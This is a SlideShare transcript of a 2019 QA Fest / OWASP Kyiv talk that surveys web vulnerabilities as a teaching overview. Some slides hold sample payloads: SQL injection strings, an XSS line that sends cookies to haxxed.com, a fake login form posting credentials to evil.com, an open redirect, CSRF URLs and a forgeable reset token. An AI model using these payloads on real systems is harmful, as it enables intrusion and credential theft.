-
Gehören Sie zu den Ersten, denen das gefällt!
Nächste SlideShare
QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин
- 1. KYIV 2019 Короленко Сергій Всі вразливості у веб додатках
- 2. Bugcrowd’s Vulnerability Rating Taxonomy
- 3. RCE Remote Code Execution | Code injection
- 4. RCE Remote Code Execution | Code injection
- 5. SQL Injection
- 6. SQL Injection
- 7. SQL Injection
- 8. SQL Injection
- 9. SQL Injection
- 10. Stacked queries UNION query-based Error-based Boolean-based blind Time-based blind 1 AND (ascii(substr((SELECT version()),1,1))) > 52— 1 AND IF((SELECT ascii(substr(version(),1,1))) > 53,sleep(10),NULL)— 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)-- 1 UNION ALL SELECT NULL,version()-- 1; SELECT version()-- SQL Injection
- 11. XXE |XML external entity injection
- 12. FILE INCLUSION <?php $file = $_GET[«file»]; include(“/var/www/backend/$file”); ?> https://example.com/?page=contact.php
- 13. DIRECTORY TRAVERSAL
- 14. UNSAFE FILE UPLOAD
- 15. UNSAFE FILE UPLOAD
- 16. CRLF injection (CRLF, rn, %0A%0D)
- 17. HTML Injection Hi! My name is <h1>hacker</h1> Hello HACKER Hi! My name is <h1>Log in to view a content</h1> <form action="http://evil.com"> Username: <input name="username"><br> Password: <input name="password"><br> <input type="submit"> </form>
- 18. XSS | Cross Site Scripting
- 19. XSS Stored/Reflected
- 20. XSS | Cross Site Scripting www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>
- 21. Open Redirection https://bank.com/redirect.php?go=http://attacker.com/phish/
- 22. http://bank.com/transfer?amount=50.0&from=4165**02&to=7893-1892-2940-4280 http://bank.com/transfer?amount=50.0&from=4165**02&to=4153-1802-9420-4483 CSRF | Cross-Site Request Forgery
- 23. CSRF | Cross-Site Request Forgery
- 24. SSRF| Server Side Request Forgery http://example.com/?url=http://localhost/server-status
- 25. Default Credentials/Configuration
- 26. Authentication Bypass
- 27. Weak Password Policy
- 28. Weak password reset question/answer
- 29. Weak password change/reset http://bank.com/reset_password?email=ololo@example.com&token=1561324612 http://bank.com/reset_password?email=ololo@example.com&token=1561324754 http://bank.com/reset_password?email=ololo@example.com&token=1561324698 MD5 ("ololo@example.com") = 83fa8dbfe2725ff513c4028a7f60df36 http://bank.com/reset_password?email=ololo@example.com&token= 83fa8dbfe2725ff513c4028a7f60df36 http://bank.com/reset_password?email=ololo@example.com&token= 83fa8dbfe2725ff513c4028a7f60df36
- 30. Bypass 2FA
- 31. Privilege Escalation
- 32. Broken Access Control http://bank.com/admin/reset_password?user=ololo@example.com&newpass=3.1415pec!
- 33. COOKIES Attributes
- 34. Session Fixation
- 35. Password API Keys /.git/ Sensitive Data Exposure
- 36. Directory Listing DirSearch (backups, logs, etc.)
- 37. Unencrypted Communication
- 38. Privileged user: uid=0(root) No Rate Limits CAPTCHA Bypass
- 39. Security Headers •Server headers that protect against attacks ◦HTTP Strict Transport Security ◦Content Security Policy ◦Access-Control-Allow-Origin ◦X-FrameOptions ◦X-XSS-Protection ◦X-Content-Type-Options •Server headers that leak information ◦Server ◦X-Powered-By ◦X-AspNet-Version
- 40. Detailed Error
- 41. https://www.youtube.com/OWASPKyiv https://www.facebook.com/owaspkyiv https://owasp.slack.com/messages/chapter-ua/
Als Erste(r) kommentieren